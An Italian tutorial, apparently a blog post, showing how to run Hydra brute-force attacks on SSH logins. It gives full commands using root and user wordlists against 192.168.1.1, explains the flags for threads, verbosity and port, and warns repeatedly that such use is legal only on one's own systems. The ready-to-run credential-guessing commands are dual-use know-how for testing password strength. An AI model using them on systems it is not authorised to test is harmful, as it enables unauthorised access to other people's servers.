Hydra brute force attack. Brute force with hydra.
Hydra
Utilizziamo Hydra per effettuare un Brute Force Attack
Cosa è Hydra ? Hydra è uno strumento ben conosciuto con il quale è possibile lanciare attacchi a “forza bruta” brute-force su credenziali di accesso per diversi protocolli.
L’utility Hydra ha la possibilità di ” attaccare ” i login su una varietà di protocolli differenti , ma in questo caso, andremo a testare la resistenza delle password su SSH.
Attenzione: Hydra è uno strumentoche può essere usato per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !
SSH è presente sulla quasi totalità dei server Linux o Unix e di solito è il modo principale per gli amministratori per accedere e gestire i loro sistemi. In questo articolo parlerò di utilizzo di wordlists “lista di parole” da fornire a Hydra con le password da testare. Con le WordList andremo ad effettuare un attacco mirato con un numero definito di parole che comporta una diminuzione della percentuale di riuscita , ma crea sia quel flusso di rete che un alto numero di tentativi di accesso da poter utilizzare per rendere sicuro il nostro server con contromisure attive.
Attenzione: è uno strumento che può essere usato anche per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !
1) Andiamo a testare con singolo utente root il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt
Comando:
hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh
-l = parametro che va ad identificare Utente Singolo ( in questo caso root)
root = variabile , si va a identificare username da attaccare
-P = parametro che va ad identificare un attacco con lista
/usr/share/lista/password.txt = identificazione vocabolario
192.168.1.1 Indirizzo ip del server da attaccare
-t = parametro che indica a Idra il numero di thread da utilizzare ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)
ssh = Protocollo da attaccare
2) Andiamo a testare con utenti multipli prelevati da /usr/share/lista/utenti.txt il protocollo ssh del server 192.168.1.1 con lista presente in /usr/share/lista/password.txt
Comando:
hydra -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh
-L = lista utenti (L maiuscola)
/usr/share/lista/utenti.txt = identificazione vocabolario
-P = parametro che va ad identificare un attacco con lista
/usr/share/lista/password.txt = identificazione vocabolario
192.168.1.1 Indirizzo ip del server da attaccare
-t = parametro che indica a Idra il numero di thread da utilizzare ( nel nostro caso 4 come suggerisce il manuale di Idra per attacco a ssh)
ssh = Protocollo da attaccare
Altri parametri.
-V or -v
il parametro -V controlla il livello di dettaglio in output di quello che Hydra sta facendo. -V altissimo dettaglio -v medio dettaglio
hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -V ssh
hydra -l root -P /usr/share/lista/password.txt 192.168.1.1 -t 4 -v ssh
-s
Non e’ detto che un determinato protocollo sia su una porta standard. Molti cambiano le porte per aumentare il livello di sicurezza. Con questo parametro possiamo dire su che porta tentare per il protocollo specificato.
esempio
hydra -s 44 -L /usr/share/lista/utenti.txt -P /usr/share/lista/password.txt 192.168.1.1 -t 4 ssh
Attenzione: Hydra è uno strumentoche può essere usato per attaccare. Si può utilizzare liberamente solo per testare i propri sistemi ! In caso contrario, è illegale !.
Key : hydra brute force , hydra brute force attack , come usare hydra, hydra password brute force , hydra brute force web login ,hydra password attack